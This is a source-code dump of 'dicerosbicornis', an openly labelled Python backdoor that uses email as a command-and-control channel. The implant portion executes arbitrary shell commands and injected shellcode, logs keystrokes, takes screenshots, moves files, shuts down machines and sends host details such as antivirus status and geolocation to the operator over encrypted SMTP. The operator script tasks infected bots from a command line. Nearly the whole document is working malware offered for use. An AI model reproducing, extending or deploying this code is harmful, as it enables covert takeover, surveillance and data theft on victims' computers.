603 | sendEmail({'cmd': 'tasks', 'res': 'Failed: {}'.format(e)}, self.jobid)
604 |
605 |
606 | class services(threading.Thread):
607 |
608 | def __init__(self, jobid):
609 | threading.Thread.__init__(self)
610 | self.jobid = jobid
611 | self.daemon = True
612 | self.start()
613 |
614 | def _detectServices(self):
615 | pythoncom.CoInitialize()
616 | srvs = []
617 | w = wmi.WMI ()
618 | for service in w.Win32_Service ():
619 | srvs.append('{0};{1}'.format(service.Name, str(service.StartMode)))
620 | return srvs
621 |
622 | def run(self):
623 | try:
624 | sendEmail({'cmd': 'services', 'res': self._detectServices()}, self.jobid)
625 | except Exception as e:
626 | sendEmail({'cmd': 'services', 'res': 'Failed: {}'.format(e)}, self.jobid)
627 |
628 |
629 | class users(threading.Thread):
630 |
631 | def __init__(self, jobid):
632 | threading.Thread.__init__(self)
633 | self.jobid = jobid
634 | self.daemon = True
635 | self.start()
636 |
637 | def _detectUsers(self):
638 | pythoncom.CoInitialize()
639 | usr = []
640 | w = wmi.WMI ()
641 | for user in w.Win32_UserAccount ():
642 | usr.append('{0};{1};{2}'.format(user.Name, str(AccountType(user.AccountType)).split('.')[1], 'Disabled' if user.Disabled else 'Enabled'))
643 | return usr
644 |
645 | def run(self):
646 | try:
647 | sendEmail({'cmd': 'users', 'res': self._detectUsers()}, self.jobid)
648 | except Exception as e:
649 | sendEmail({'cmd': 'users', 'res': 'Failed: {}'.format(e)}, self.jobid)
650 |
651 |
652 | class devices(threading.Thread):
653 |
654 | def __init__(self, jobid):
655 | threading.Thread.__init__(self)
656 | self.jobid = jobid
657 | self.daemon = True
658 | self.start()
659 |
660 | def _detectDevices(self):
661 | pythoncom.CoInitialize()
662 | devs = []
663 | w = wmi.WMI ()
664 | for dev in w.Win32_PnPEntity ():
665 | devs.append('{0};{1}'.format(dev.Name, dev.Manufacturer))
666 | return devs
667 |
668 | def run(self):
669 | try:
670 | sendEmail({'cmd': 'devices', 'res': self._detectDevices()}, self.jobid)
671 | except Exception as e:
672 | sendEmail({'cmd': 'devices', 'res': 'Failed: {}'.format(e)}, self.jobid)
673 |
674 |
675 | class upload(threading.Thread):
676 |
677 | def __init__(self, jobid, dest, attachment):
678 | threading.Thread.__init__(self)
679 | self.jobid = jobid
680 | self.dest = dest
681 | self.attachment = attachment
682 | self.daemon = True
683 | self.start()
684 |
685 | def run(self):
686 | try:
687 | with open(self.dest, 'wb') as fileh:
688 | fileh.write(b64decode(self.attachment))
689 | sendEmail({'cmd': 'upload', 'res': 'Success'}, self.jobid)
690 | except Exception as e:
691 | sendEmail({'cmd': 'upload', 'res': 'Failed: {}'.format(e)}, self.jobid)
692 |
693 |
694 | class lockScreen(threading.Thread):
695 |
696 | def __init__(self, jobid):
697 | threading.Thread.__init__(self)
698 | self.jobid = jobid
699 | self.daemon = True
700 | self.start()
701 |
702 | def run(self):
703 | try:
704 | ctypes.windll.user32.LockWorkStation()
705 | sendEmail({'cmd': 'lockscreen', 'res': 'Success'}, jobid=self.jobid)
706 | except Exception as e:
707 | #if verbose == True: print print_exc()
708 | pass
709 |
710 |
711 | class shutdown(threading.Thread):
712 |
713 | def __init__(self, jobid):
714 | threading.Thread.__init__(self)
715 | self.jobid = jobid
716 | self.daemon = True
717 | self.start()
718 |
719 | def run(self):
720 | try:
721 | sendEmail({'cmd': 'shutdown', 'res': 'Success'}, jobid=self.jobid)
722 | time.sleep(3)
723 | subprocess.call(["shutdown", "/f", "/s", "/t", "0"])
724 | except Exception as e:
725 | #if verbose == True: print print_exc()
726 | pass
727 |
728 |
729 | class restart(threading.Thread):
730 |
731 | def __init__(self, jobid):
732 | threading.Thread.__init__(self)
733 | self.jobid = jobid
734 | self.daemon = True
735 | self.start()
736 |
737 | def run(self):
738 | try:
739 | sendEmail({'cmd': 'restart', 'res': 'Success'}, jobid=self.jobid)
740 | time.sleep(3)
741 | subprocess.call(["shutdown", "/f", "/r", "/t", "0"])
742 | except Exception as e:
743 | #if verbose == True: print print_exc()
744 | pass
745 |
746 | class jitter(threading.Thread ):
747 |
748 | def __init__(self, command, jobid):
749 | threading.Thread.__init__(self)
750 | self.command = command
751 | self.jobid = jobid
752 | self.daemon = True
753 | self.start()
754 |
755 | def run(self):
756 | try:
757 | global JITTER
758 | JITTER = self.command
759 | sendEmail({'cmd': 'jitter', 'res': 'Success with Changing Jitter too %s Seconds' %str(JITTER)}, jobid=self.jobid)
760 |
761 | except Exception as e:
762 | #if verbose == True: print print_exc()
763 | pass
764 |
765 | class email_check(threading.Thread ):
766 |
767 | def __init__(self, command, jobid):
768 | threading.Thread.__init__(self)
769 | self.command = command
770 | self.jobid = jobid
771 | self.daemon = True
772 | self.start()
773 |
774 | def run(self):
775 | try:
776 | global EMAIL_KNOCK_TIMEOUT
777 | EMAIL_KNOCK_TIMEOUT = self.command
778 | sendEmail({'cmd': 'email_check', 'res': 'Success with changing Email Check in time too %s Seconds' %str(EMAIL_KNOCK_TIMEOUT)}, jobid=self.jobid)
779 | time.sleep(3)
780 |
781 | except Exception as e:
782 | #if verbose == True: print print_exc()
783 | pass
784 |
785 |
786 | class logoff(threading.Thread):
787 |
788 | def __init__(self, jobid):
789 | threading.Thread.__init__(self)
790 | self.jobid = jobid
791 | self.daemon = True
792 | self.start()
793 |
794 | def run(self):
795 | try:
796 | sendEmail({'cmd': 'logoff', 'res': 'Success'}, jobid=self.jobid)
797 | time.sleep(3)
798 | subprocess.call(["shutdown", "/f", "/l"])
799 | except Exception as e:
800 | #if verbose == True: print print_exc()
801 | pass
802 |
803 | class execShellcode(threading.Thread):
804 |
805 | def __init__(self, shellc, jobid):
806 | threading.Thread.__init__(self)
807 | self.shellc = shellc
808 | self.jobid = jobid
809 |
810 | self.daemon = True
811 | self.start()
812 |
813 | def run(self):
814 | try:
815 | shellcode = self.shellc.decode("string_escape")
816 | shellcode = bytearray(shellcode)
817 |
818 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
819 | ctypes.c_int(len(shellcode)),
820 | ctypes.c_int(0x3000),
821 | ctypes.c_int(0x40))
822 |
823 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
824 |
825 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
826 |
827 | ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
828 | ctypes.c_int(0),
829 | ctypes.c_int(ptr),
830 | ctypes.c_int(0),
831 | ctypes.c_int(0),
832 | ctypes.pointer(ctypes.c_int(0)))
833 |
834 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
835 |
836 | except Exception as e:
837 | #if verbose == True: print_exc()
838 | pass
839 |
840 |
841 | class visitwebsite(threading.Thread):
842 |
843 | def __init__(self, url, jobid):
844 | threading.Thread.__init__(self)
845 | self.url = url
846 | self.jobid = jobid
847 | self.daemon = True
848 | self.start()
849 |
850 | def run(self):
851 | try:
852 | urllib2.urlopen(self.url).read()
853 | sendEmail({'cmd': 'visitwebsite', 'res': 'Success'}, jobid=self.jobid)
854 | except Exception as e:
855 | #if verbose == True: print_exc()
856 | pass
857 |
858 |
859 | class execCmd(threading.Thread):
860 |
861 | def __init__(self, command, jobid):
862 | threading.Thread.__init__(self)
863 | self.command = command
864 | self.jobid = jobid
865 |
866 | self.daemon = True
867 | self.start()
868 |
869 | def run(self):
870 | try:
871 | proc = subprocess.Popen(self.command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
872 | stdout_value = proc.stdout.read()
873 | stdout_value += proc.stderr.read()
874 |
875 | sendEmail({'cmd': self.command, 'res': stdout_value}, jobid=self.jobid)
876 | except Exception as e:
877 | #if verbose == True: print_exc()
878 | pass
879 |
880 |
881 | class message(threading.Thread):
882 |
883 | def __init__(self, TextAndTitle, jobid):
884 | threading.Thread.__init__(self)
885 | self.TextAndTitle = TextAndTitle
886 | self.jobid = jobid
887 |
888 | self.daemon = True
889 | self.start()
890 |
891 | def run(self):
892 | try:
893 | ctypes.windll.user32.MessageBoxW(0, self.TextAndTitle[0], self.TextAndTitle[1], 0)
894 | sendEmail({'cmd': 'message', 'res': 'Success'}, jobid=self.jobid)
895 | except Exception as e:
896 | #if verbose == True: print_exc()
897 | pass
898 |
899 |
900 | def genRandomString(slen=10):
901 | return ''.join(random.sample(string.ascii_letters + string.digits, slen))
902 |
903 |
904 | def detectForgroundWindows():
905 | #Stolen fom https://sjohannes.wordpress.com/2012/03/23/win32-python-getting-all-window-titles/
906 | EnumWindows = ctypes.windll.user32.EnumWindows
907 | EnumWindowsProc = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int))
908 | GetWindowText = ctypes.windll.user32.GetWindowTextW
909 | GetWindowTextLength = ctypes.windll.user32.GetWindowTextLengthW
910 | IsWindowVisible = ctypes.windll.user32.IsWindowVisible
911 |
912 | titles = []
913 | def foreach_window(hwnd, lParam):
914 | if IsWindowVisible(hwnd):
915 | length = GetWindowTextLength(hwnd)
916 | buff = ctypes.create_unicode_buffer(length + 1)
917 | GetWindowText(hwnd, buff, length + 1)
918 | titles.append(buff.value)
919 | return True
920 |
921 | EnumWindows(EnumWindowsProc(foreach_window), 0)
922 |
923 | return titles
924 |
925 |
926 | class sendEmail(threading.Thread):
927 |
928 | def __init__(self, text, jobid='', attachment=[], checkin=False):
929 | threading.Thread.__init__(self)
930 | self.text = text
931 | self.jobid = jobid
932 | self.attachment = attachment
933 | self.checkin = checkin
934 | self.daemon = True
935 | self.start()
936 |
937 | def run(self):
938 | sub_header = sysInfo.UniqueID
939 | if self.jobid:
940 | sub_header = 'dmp:{}:{}'.format(sysInfo.UniqueID, self.jobid)
941 | elif self.checkin:
942 | sub_header = 'hereiam:{}'.format(sysInfo.UniqueID)
943 |
944 | msg = MIMEMultipart()
945 | msg['From'] = sub_header
946 | msg['To'] = mail_user
947 | msg['Subject'] = sub_header
948 |
949 | message_content = infoSec.Encrypt(json.dumps({
950 | 'fgwindow': detectForgroundWindows(),
951 | 'user': '{0}@{1}'.format(sysInfo.User, sysInfo.PCName),
952 | 'arch': sysInfo.Architecture,
953 | 'os': sysInfo.WinVer,
954 | 'cpu': sysInfo.CPU,
955 | 'gpu': sysInfo.GPU,
956 | 'motherboard': sysInfo.Motherboard,
957 | 'isAdmin': sysInfo.isAdmin,
958 | 'chassistype': sysInfo.ChassisType,
959 | 'totalram': sysInfo.TotalRam,
960 | 'bios': sysInfo.Bios,
961 | 'pid': sysInfo.PID,
962 | 'mac': sysInfo.MAC,
963 | 'ipv4': sysInfo.IPv4,
964 | 'av': sysInfo.Antivirus,
965 | 'firewall': sysInfo.Firewall,
966 | 'antispyware': sysInfo.Antispyware,
967 | 'geolocation': sysInfo.Geolocation,
968 | 'tag': TAG,
969 | 'version': VERSION,
970 | 'msg': self.text
971 | }))
972 |
973 | msg.attach(MIMEText(str(message_content)))
974 |
975 | for attach in self.attachment:
976 | if os.path.exists(attach) == True:
977 | part = MIMEBase('application', 'octet-stream')
978 | part.set_payload(open(attach, 'rb').read())
979 | Encoders.encode_base64(part)
980 | part.add_header('Content-Disposition', 'attachment; filename="{}"'.format(os.path.basename(attach)))
981 | msg.attach(part)
982 |
983 | while True:
984 | try:
985 | mailServer = SMTP()
986 | mailServer.connect(server, server_port)
987 | mailServer.starttls()
988 | mailServer.login(mail_user,mail_pwd)
989 | mailServer.sendmail(mail_user, mail_user, msg.as_string())
990 | mailServer.quit()
991 | break
992 | except Exception as e:
993 | #if verbose == True: print_exc()
994 | time.sleep(10)
995 |
996 |
997 | def checkJobs():
998 | #Here we check the inbox for queued jobs, parse them and start a thread
999 | #EMAIL_KNOCK_TIMEOUT = 60 # seconds - check for new commands/jobs every EMAIL_KNOCK_TIMEOUT seconds
1000 | #JITTER = 100
1001 | while True:
1002 |
1003 | try:
1004 | c = imaplib.IMAP4_SSL(server)
1005 | c.login(mail_user, mail_pwd)
1006 | c.select("INBOX")
1007 |
1008 | typ, id_list = c.uid('search', None, '(UNSEEN SUBJECT "dicerosbicornis:{}")'.format(sysInfo.UniqueID))
1009 |
1010 | for msg_id in id_list[0].split():
1011 |
1012 | #logging.debug("[checkJobs] parsing message with uid: {}".format(msg_id))
1013 |
1014 | msg_data = c.uid('fetch', msg_id, '(RFC822)')
1015 | msg = MessageParser(msg_data)
1016 | jobid = msg.subject.split(':')[2]
1017 |
1018 | if msg.dict:
1019 | cmd = msg.dict['cmd'].lower()
1020 | arg = msg.dict['arg']
1021 |
1022 | #logging.debug("[checkJobs] CMD: {} JOBID: {}".format(cmd, jobid))
1023 |
1024 | if cmd == 'execshellcode':
1025 | execShellcode(arg, jobid)
1026 |
1027 | elif cmd == 'download':
1028 | download(jobid, arg)
1029 |
1030 | elif cmd == 'downloadfromurl':
1031 | downloadfromurl(jobid, arg)
1032 |
1033 | elif cmd == 'upload':
1034 | upload(jobid, arg, msg.attachment)
1035 |
1036 | elif cmd == 'screenshot':
1037 | screenshot(jobid)
1038 |
1039 | elif cmd == 'tasks':
1040 | tasks(jobid)
1041 |
1042 | elif cmd == 'services':
1043 | services(jobid)
1044 |
1045 | elif cmd == 'users':
1046 | users(jobid)
1047 |
1048 | elif cmd == 'devices':
1049 | devices(jobid)
1050 |
1051 | elif cmd == 'cmd':
1052 | execCmd(arg, jobid)
1053 |
1054 | elif cmd == 'visitwebsite':
1055 | visitwebsite(arg, jobid)
1056 |
1057 | elif cmd == 'message':
1058 | message(arg, jobid)
1059 |
1060 | elif cmd == 'lockscreen':
1061 | lockScreen(jobid)
1062 |
1063 | elif cmd == 'shutdown':
1064 | shutdown(jobid)
1065 |
1066 | elif cmd == 'restart':
1067 | restart(jobid)
1068 |
1069 | elif cmd == 'logoff':
1070 | logoff(jobid)
1071 |
1072 | elif cmd == 'startkeylogger':
1073 | keylogger.exit = False
1074 | keylogger(jobid)
1075 |
1076 | elif cmd == 'stopkeylogger':
1077 | keylogger.exit = True
1078 |
1079 | elif cmd == 'forcecheckin':
1080 | sendEmail("Host checking in as requested", checkin=True)
1081 |
1082 | elif cmd == 'email_check':
1083 | email_check(arg, jobid)
1084 | #EMAIL_KNOCK_TIMEOUT = int(arg)
1085 | sendEmail("Email Checking changed too: %s seconds" % str(arg), checkin=True)
1086 |
1087 | elif cmd == 'jitter':
1088 |
1089 | jitter(arg, jobid)
1090 | #JITTER = int(arg)
1091 | sendEmail("JITTER UPDATED too: %s seconds" % str(arg), checkin=True)
1092 |
1093 |
1094 | else:
1095 | raise NotImplementedError
1096 |
1097 | c.logout()
1098 |
1099 |
1100 | if JITTER != 100:
1101 | JITTER_HIGH =((EMAIL_KNOCK_TIMEOUT * JITTER) /100.0) * 3
1102 | JITTER_LOW = (EMAIL_KNOCK_TIMEOUT * JITTER) /100.0
1103 |
1104 | time.sleep(random.randrange(JITTER_LOW, JITTER_HIGH))
1105 | else:
1106 | time.sleep(EMAIL_KNOCK_TIMEOUT)
1107 |
1108 |
1109 | except Exception as e:
1110 | #logging.debug(format_exc())
1111 | time.sleep(EMAIL_KNOCK_TIMEOUT)
1112 |
1113 |
1114 | if __name__ == '__main__':
1115 | sendEmail("Welcome!! :D", checkin=True)
1116 | try:
1117 | checkJobs()
1118 | except KeyboardInterrupt:
1119 | pass
1120 |
1121 |
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2 | !.gitignore
3 |
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1 | """
2 | This file is part of dicerosbicornis
3 | Copyright (C) 2017 @maldevel
4 | https://github.com/maldevel/dicerosbicornis
5 |
6 | dicerosbicornis - A fully featured backdoor that uses email as a C&C server.
7 |
8 | This program is free software: you can redistribute it and/or modify
9 | it under the terms of the GNU General Public License as published by
10 | the Free Software Foundation, either version 3 of the License, or
11 | (at your option) any later version.
12 |
13 | This program is distributed in the hope that it will be useful,
14 | but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | GNU General Public License for more details.
17 |
18 | You should have received a copy of the GNU General Public License
19 | along with this program. If not, see .
20 |
21 | For more see the file 'LICENSE' for copying permission.
22 | """
23 |
24 | __author__ = "maldevel"
25 | __copyright__ = "Copyright (c) 2017 @maldevel"
26 | __credits__ = ["maldevel"]
27 | __license__ = "GPLv3"
28 | __version__ = "1.0"
29 | __maintainer__ = "maldevel"
30 |
31 |
32 | #####################
33 |
34 | import argparse
35 | import email
36 | import imaplib
37 | import sys
38 | import base64
39 | import string
40 | import os
41 | import json
42 | import random
43 | import hashlib
44 |
45 | from base64 import b64decode
46 | from smtplib import SMTP
47 | from argparse import RawTextHelpFormatter
48 | from email.MIMEMultipart import MIMEMultipart
49 | from email.MIMEBase import MIMEBase
50 | from email.MIMEText import MIMEText
51 | from email import Encoders
52 | from Crypto.Cipher import AES
53 | from Crypto import Random
54 |
55 | ######################################################
56 |
57 | mail_user = 'myuser@example.com'
58 | mail_pwd = 'mypassword'
59 | server = "mail.example.com"
60 | server_port = 587
61 | AESKey = 'my_AES_key'
62 |
63 | ############################################
64 |
65 | def generateJobID():
66 | return hashlib.sha256(''.join(random.sample(string.ascii_letters + string.digits, 30))).hexdigest()
67 |
68 | class InfoSecurity:
69 |
70 | def __init__(self):
71 | self.bs = 32
72 | self.key = hashlib.sha256(AESKey.encode()).digest()
73 |
74 | def Encrypt(self, plainText):
75 | raw = self._pad(plainText)
76 | iv = Random.new().read(AES.block_size)
77 | cipher = AES.new(self.key, AES.MODE_CBC, iv)
78 | return base64.b64encode(iv + cipher.encrypt(raw))
79 |
80 | def Decrypt(self, cipherText):
81 | enc = base64.b64decode(cipherText)
82 | iv = enc[:AES.block_size]
83 | cipher = AES.new(self.key, AES.MODE_CBC, iv)
84 | return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
85 |
86 | def _pad(self, s):
87 | return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
88 |
89 | def _unpad(self, s):
90 | return s[:-ord(s[len(s)-1:])]
91 |
92 | infoSec = InfoSecurity()
93 |
94 |
95 | class MessageParser:
96 |
97 | def __init__(self, msg_data):
98 | self.attachment = None
99 | self.getPayloads(msg_data)
100 | self.getSubjectHeader(msg_data)
101 | self.getDateHeader(msg_data)
102 |
103 | def getPayloads(self, msg_data):
104 | for payload in email.message_from_string(msg_data[1][0][1]).get_payload():
105 | if payload.get_content_maintype() == 'text':
106 | self.text = payload.get_payload()
107 | self.dict = json.loads(infoSec.Decrypt(payload.get_payload()))
108 |
109 | elif payload.get_content_maintype() == 'application':
110 | self.attachment = payload.get_payload()
111 |
112 | def getSubjectHeader(self, msg_data):
113 | self.subject = email.message_from_string(msg_data[1][0][1])['Subject']
114 |
115 | def getDateHeader(self, msg_data):
116 | self.date = email.message_from_string(msg_data[1][0][1])['Date']
117 |
118 |
119 | class dicerosbicornis:
120 |
121 | def __init__(self):
122 | self.c = imaplib.IMAP4_SSL(server)
123 | self.c.login(mail_user, mail_pwd)
124 |
125 | def sendEmail(self, botid, jobid, cmd, arg='', attachment=[]):
126 |
127 | if (botid is None) or (jobid is None):
128 | sys.exit("[-] You must specify a client id (-id) and a jobid (-job-id)")
129 |
130 | sub_header = 'dicerosbicornis:{}:{}'.format(botid, jobid)
131 |
132 | msg = MIMEMultipart()
133 | msg['From'] = sub_header
134 | msg['To'] = mail_user
135 | msg['Subject'] = sub_header
136 | msgtext = json.dumps({'cmd': cmd, 'arg': arg})
137 | msg.attach(MIMEText(str(infoSec.Encrypt(msgtext))))
138 |
139 | for attach in attachment:
140 | if os.path.exists(attach) == True:
141 | part = MIMEBase('application', 'octet-stream')
142 | part.set_payload(open(attach, 'rb').read())
143 | Encoders.encode_base64(part)
144 | part.add_header('Content-Disposition', 'attachment; filename="{}"'.format(os.path.basename(attach)))
145 | msg.attach(part)
146 |
147 | mailServer = SMTP()
148 | mailServer.connect(server, server_port)
149 | mailServer.starttls()
150 | mailServer.login(mail_user, mail_pwd)
151 | mailServer.sendmail(mail_user, mail_user, msg.as_string())
152 | mailServer.quit()
153 |
154 | print "[*] Command sent successfully with jobid: {}".format(jobid)
155 |
156 |
157 | def checkBots(self):
158 | bots = []
159 | self.c.select(readonly=1)
160 | rcode, idlist = self.c.uid('search', None, '(SUBJECT "hereiam:")')
161 |
162 | print rcode, idlist
163 |
164 | for idn in idlist[0].split():
165 | msg_data = self.c.uid('fetch', idn, '(RFC822)')
166 | msg = MessageParser(msg_data)
167 |
168 | try:
169 | botid = str(msg.subject.split(':')[1])
170 | if botid not in bots:
171 | bots.append(botid)
172 |
173 | print botid, msg.dict['os']
174 |
175 | except Exception as e:
176 | print e
177 | pass
178 |
179 | def getBotInfo(self, botid):
180 |
181 | if botid is None:
182 | sys.exit("[-] You must specify a client id (-id)")
183 |
184 | self.c.select(readonly=1)
185 | rcode, idlist = self.c.uid('search', None, '(SUBJECT "hereiam:{}")'.format(botid))
186 |
187 | for idn in idlist[0].split():
188 | msg_data = self.c.uid('fetch', idn, '(RFC822)')
189 | msg = MessageParser(msg_data)
190 |
191 | print "ID: " + botid
192 | print "DATE: '{}'".format(msg.date)
193 | print "PID: " + str(msg.dict['pid'])
194 | print "USER: " + str(msg.dict['user'])
195 | print "OS: " + str(msg.dict['os'])
196 | print "ARCHITECTURE: " + str(msg.dict['arch'])
197 | print "CPU: " + str(msg.dict['cpu'])
198 | print "GPU: " + str(msg.dict['gpu'])
199 | print "MOTHERBOARD: " + str(msg.dict['motherboard'])
200 | print "CHASSIS TYPE: " + str(msg.dict['chassistype'])
201 | print "ADMIN: " + str(msg.dict['isAdmin'])
202 | print "TOTAL RAM: {}GB".format(str(msg.dict['totalram']))
203 | print "BIOS: " + str(msg.dict['bios'])
204 | print "MAC ADDRESS: " + str(msg.dict['mac'])
205 | print "LOCAl IPv4 ADDRESS: " + str(msg.dict['ipv4'])
206 | print "Antivirus: '{}'".format(msg.dict['av'])
207 | print "Firewall: '{}'".format(msg.dict['firewall'])
208 | print "Antispyware: '{}'".format(msg.dict['antispyware'])
209 | print "TAG: " + str(msg.dict['tag'])
210 | print "CLIENT VERSION: " + str(msg.dict['version'])
211 | print "GEOLOCATION: '{}'".format(msg.dict['geolocation'])
212 | print "FG WINDOWS: '{}'\n".format(msg.dict['fgwindow'])
213 |
214 |
215 | def getJobResults(self, botid, jobid):
216 |
217 | if (botid is None) or (jobid is None):
218 | sys.exit("[-] You must specify a client id (-id) and a jobid (-job-id)")
219 |
220 | self.c.select(readonly=1)
221 | rcode, idlist = self.c.uid('search', None, '(SUBJECT "dmp:{}:{}")'.format(botid, jobid))
222 |
223 | for idn in idlist[0].split():
224 | msg_data = self.c.uid('fetch', idn, '(RFC822)')
225 | msg = MessageParser(msg_data)
226 |
227 | print "DATE: '{}'".format(msg.date)
228 | print "JOBID: " + jobid
229 | print "FG WINDOWS: '{}'".format(msg.dict['fgwindow'])
230 | print "CMD: '{}'".format(msg.dict['msg']['cmd'])
231 | print ''
232 | print "'{}'\n".format(msg.dict['msg']['res'])
233 | #print msg.dict['msg']['res'] + '\n'
234 |
235 | if msg.attachment:
236 |
237 | if msg.dict['msg']['cmd'] == 'screenshot':
238 | imgname = '{}-{}.png'.format(botid, jobid)
239 | with open("./data/" + imgname, 'wb') as image:
240 | image.write(b64decode(msg.attachment))
241 | image.close()
242 |
243 | print "[*] Screenshot saved to ./data/" + imgname
244 |
245 | elif msg.dict['msg']['cmd'] == 'download':
246 | filename = "{}-{}".format(botid, jobid)
247 | with open("./data/" + filename, 'wb') as dfile:
248 | dfile.write(b64decode(msg.attachment))
249 | dfile.close()
250 |
251 | print "[*] Downloaded file saved to ./data/" + filename
252 |
253 | def logout(self):
254 | self.c.logout()
255 |
256 |
257 | if __name__ == '__main__':
258 |
259 | parser = argparse.ArgumentParser(version='1.0.0', formatter_class=RawTextHelpFormatter)
260 |
261 | parser.add_argument("-id", dest='id', type=str, default=None, help="Client to target")
262 | parser.add_argument('-jobid', dest='jobid', default=None, type=str, help='Job id to retrieve')
263 |
264 | agroup = parser.add_argument_group()
265 | blogopts = agroup.add_mutually_exclusive_group()
266 | blogopts.add_argument("-list", dest="list", action="store_true", help="List available clients")
267 | blogopts.add_argument("-info", dest='info', action='store_true', help='Retrieve info on specified client')
268 |
269 | sgroup = parser.add_argument_group("Commands", "Commands to execute on a client")
270 | slogopts = sgroup.add_mutually_exclusive_group()
271 | slogopts.add_argument("-cmd", metavar='CMD', dest='cmd', type=str, help='Execute a system command')
272 | slogopts.add_argument("-visitwebsite", metavar='URL', dest='visitwebsite', type=str, help='Visit website')
273 | slogopts.add_argument("-message", metavar=('TEXT', 'TITLE'), nargs=2, type=str, help='Show message to user')
274 | slogopts.add_argument("-tasks", dest='tasks', action='store_true', help='Retrieve running processes')
275 | slogopts.add_argument("-services", dest='services', action='store_true', help='Retrieve system services')
276 | slogopts.add_argument("-users", dest='users', action='store_true', help='Retrieve system users')
277 | slogopts.add_argument("-devices", dest='devices', action='store_true', help='Retrieve devices(Hardware)')
278 | slogopts.add_argument("-download", metavar='PATH', dest='download', type=str, help='Download a file from a clients system')
279 | slogopts.add_argument("-download-fromurl", metavar='URL', dest='fromurl', type=str, help='Download a file from the web')
280 | slogopts.add_argument("-upload", nargs=2, metavar=('SRC', 'DST'), help="Upload a file to the clients system")
281 | slogopts.add_argument("-exec-shellcode", metavar='FILE',type=argparse.FileType('rb'), dest='shellcode', help='Execute supplied shellcode on a client')
282 | slogopts.add_argument("-screenshot", dest='screen', action='store_true', help='Take a screenshot')
283 | slogopts.add_argument("-lock-screen", dest='lockscreen', action='store_true', help='Lock the clients screen')
284 | slogopts.add_argument("-shutdown", dest='shutdown', action='store_true', help='Shutdown remote computer')
285 | slogopts.add_argument("-restart", dest='restart', action='store_true', help='Restart remote computer')
286 | slogopts.add_argument("-logoff", dest='logoff', action='store_true', help='Log off current remote user')
287 | slogopts.add_argument("-force-checkin", dest='forcecheckin', action='store_true', help='Force a check in')
288 | slogopts.add_argument("-start-keylogger", dest='keylogger', action='store_true', help='Start keylogger')
289 | slogopts.add_argument("-stop-keylogger", dest='stopkeylogger', action='store_true', help='Stop keylogger')
290 | slogopts.add_argument("-email-checkin",type=int, metavar='CHECK', dest='email_check', help='Seconds to wait before checking for new commands')
291 | slogopts.add_argument("-jitter", metavar='jit',type=int, dest='jitter', help='Percentage of Jitter')
292 |
293 | if len(sys.argv) is 1:
294 | parser.print_help()
295 | sys.exit()
296 |
297 | args = parser.parse_args()
298 |
299 | dicerosbicornis = dicerosbicornis()
300 | jobid = generateJobID()
301 |
302 | if args.list:
303 | dicerosbicornis.checkBots()
304 |
305 | elif args.info:
306 | dicerosbicornis.getBotInfo(args.id)
307 |
308 | elif args.cmd:
309 | dicerosbicornis.sendEmail(args.id, jobid, 'cmd', args.cmd)
310 |
311 | elif args.visitwebsite:
312 | dicerosbicornis.sendEmail(args.id, jobid, 'visitwebsite', args.visitwebsite)
313 |
314 | elif args.message:
315 | dicerosbicornis.sendEmail(args.id, jobid, 'message', args.message)
316 |
317 | elif args.tasks:
318 | dicerosbicornis.sendEmail(args.id, jobid, 'tasks')
319 |
320 | elif args.services:
321 | dicerosbicornis.sendEmail(args.id, jobid, 'services')
322 |
323 | elif args.users:
324 | dicerosbicornis.sendEmail(args.id, jobid, 'users')
325 |
326 | elif args.devices:
327 | dicerosbicornis.sendEmail(args.id, jobid, 'devices')
328 |
329 | elif args.shellcode:
330 | dicerosbicornis.sendEmail(args.id, jobid, 'execshellcode', args.shellcode.read().strip())
331 |
332 | elif args.download:
333 | dicerosbicornis.sendEmail(args.id, jobid, 'download', r'{}'.format(args.download))
334 |
335 | elif args.fromurl:
336 | dicerosbicornis.sendEmail(args.id, jobid, 'downloadfromurl', r'{}'.format(args.fromurl))
337 |
338 | elif args.upload:
339 | dicerosbicornis.sendEmail(args.id, jobid, 'upload', r'{}'.format(args.upload[1]), [args.upload[0]])
340 |
341 | elif args.screen:
342 | dicerosbicornis.sendEmail(args.id, jobid, 'screenshot')
343 |
344 | elif args.lockscreen:
345 | dicerosbicornis.sendEmail(args.id, jobid, 'lockscreen')
346 |
347 | elif args.shutdown:
348 | dicerosbicornis.sendEmail(args.id, jobid, 'shutdown')
349 |
350 | elif args.restart:
351 | dicerosbicornis.sendEmail(args.id, jobid, 'restart')
352 |
353 | elif args.logoff:
354 | dicerosbicornis.sendEmail(args.id, jobid, 'logoff')
355 |
356 | elif args.forcecheckin:
357 | dicerosbicornis.sendEmail(args.id, jobid, 'forcecheckin')
358 |
359 | elif args.keylogger:
360 | dicerosbicornis.sendEmail(args.id, jobid, 'startkeylogger')
361 |
362 | elif args.stopkeylogger:
363 | dicerosbicornis.sendEmail(args.id, jobid, 'stopkeylogger')
364 |
365 | elif args.email_check:
366 | dicerosbicornis.sendEmail(args.id, jobid, 'email_check', args.email_check)
367 |
368 | elif args.jitter:
369 | dicerosbicornis.sendEmail(args.id, jobid, 'jitter', args.jitter)
370 |
371 | elif args.jobid:
372 | dicerosbicornis.getJobResults(args.id, args.jobid)
373 |
374 |
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/requirements.txt:
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1 | pycrypto
2 | wmi
3 | enum34
4 | netifaces
5 | pypiwin32
6 |
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/shellcode_generate.py:
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1 | """
2 | This file is part of dicerosbicornis
3 | Copyright (C) 2017 @maldevel
4 | https://github.com/maldevel/dicerosbicornis
5 |
6 | dicerosbicornis - A fully featured backdoor that uses email as a C&C server.
7 |
8 | This program is free software: you can redistribute it and/or modify
9 | it under the terms of the GNU General Public License as published by
10 | the Free Software Foundation, either version 3 of the License, or
11 | (at your option) any later version.
12 |
13 | This program is distributed in the hope that it will be useful,
14 | but WITHOUT ANY WARRANTY; without even the implied warranty of
